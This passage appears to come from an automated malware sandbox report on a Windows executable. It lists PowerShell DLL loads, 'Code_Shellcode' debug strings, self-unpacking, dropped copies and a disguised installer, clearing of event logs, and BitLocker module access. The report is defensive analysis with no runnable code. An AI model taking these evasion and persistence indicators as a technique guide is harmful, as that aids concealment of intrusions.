                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                              Source: HGwpjJUqhW.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                              Source: HGwpjJUqhW.exeStatic file information: File size 5289240 > 1048576
                              Source: HGwpjJUqhW.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2d9400
                              Source: HGwpjJUqhW.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x1ef400
                              Source: Binary string: \Release\Code_Shellcode.pdb source: HGwpjJUqhW.exe, HGwpjJUqhW.exe, 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, HGwpjJUqhW.exe, 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                              Source: Binary string: \Release\Code_Shellcode.pdb,''GCTL source: HGwpjJUqhW.exe, 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, HGwpjJUqhW.exe, 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                              Source: Binary string: System.Management.Automation.pdbqZ source: powershell.exe, 0000000B.00000002.1806516664.0000000007061000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1806383583.0000000007002000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: E:\workplace\Androws\p-7d0bede0cc4642bcb2fb80f584c30f51\1\Build\bin\Release\AndrowsInstaller.pdb source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.dr
                              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb& source: powershell.exe, 0000000B.00000002.1806383583.0000000007002000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: Attempt to access uninitialized member object: TVEProcessPacket.PdbForwarderContext source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.dr
                              Source: Binary string: SAttempt to access uninitialized member object: TVEProcessPacket.PdbForwarderContextSVWU source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.dr
                              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1806516664.0000000007061000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb$ source: powershell.exe, 0000000B.00000002.1806516664.0000000007061000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbp4 source: powershell.exe, 0000000B.00000002.1814728739.00000000081E1000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: E:\workplace\Androws\p-7d0bede0cc4642bcb2fb80f584c30f51\1\Build\bin\Release\AndrowsInstaller.pdbN source: pc_yyb_2700200680_installer.exe.0.dr, pc_yyb_2700200680_installer[1].exe.0.dr

                              Data Obfuscation

                              barindex
                              Detected unpacking (overwrites its own PE header)
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeUnpacked PE file: 0.2.HGwpjJUqhW.exe.400000.0.unpack
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_03627490 wsprintfW,LoadLibraryW,GetProcAddress,MultiByteToWideChar,swprintf,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary,5_2_03627490
                              Source: HGwpjJUqhW.exeStatic PE information: real checksum: 0x5142eb should be: 0x5193ed
                              Source: HGwpjJUqhW.exe.0.drStatic PE information: real checksum: 0x5142eb should be: 0x5193ed
                              Source: pc_yyb_2700200680_installer[1].exe.0.drStatic PE information: section name: _RDATA
                              Source: pc_yyb_2700200680_installer[1].exe.0.drStatic PE information: section name: .QMGuid
                              Source: pc_yyb_2700200680_installer.exe.0.drStatic PE information: section name: _RDATA
                              Source: pc_yyb_2700200680_installer.exe.0.drStatic PE information: section name: .QMGuid
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00C6EBF8 push B61807CCh; retf 3_2_00C6EDD6
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00C6AC8B push ecx; retf 3_2_00C6AC9A
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00C6AC9B push ecx; retf 3_2_00C6ACAA
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00C6AC1F push ecx; retf 3_2_00C6AC8A
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_082048F0 push ecx; retf 3_2_082048FE
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_08206570 push ecx; retf 3_2_0820657E
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_03634345 push ecx; ret 5_2_03634358
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_03642470 push ebp; retf 5_2_03642474
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_03642471 push ebp; retf 5_2_03642474
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_03642450 push ebp; retf 5_2_03642474
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_02C368B8 push 691402C3h; ret 5_2_02C368C2
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_02C4FE9A push ecx; ret 5_2_02C4FEBF
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_02C39DF5 push ecx; ret 5_2_02C39E08
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_0288CAFF push eax; retf 5_2_0288CB00
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_0288CB0B push 701000CBh; retf 5_2_0288CB10
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_0288CB07 pushad ; retf 5_2_0288CB08
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_0288CB61 pushfd ; retf 5_2_0288CB64
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_02889DCC push ecx; ret 5_2_02889DDF
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_034B3D04 push ecx; ret 5_2_034B3D17
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00D899B5 push esp; iretd 11_2_00D899B9
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\pc_yyb_2700200680_installer[1].exeJump to dropped file
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeFile created: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeJump to dropped file
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeFile created: C:\Users\user\Downloads\pc_yyb_2700200680_installer.exeJump to dropped file

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Loading BitLocker PowerShell Module
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_0362B3C0 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog,5_2_0362B3C0
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeKey value created or modified: HKEY_CURRENT_USER\Console\0 9e9e85e05ee16fc372a0c7df6549fbd4Jump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
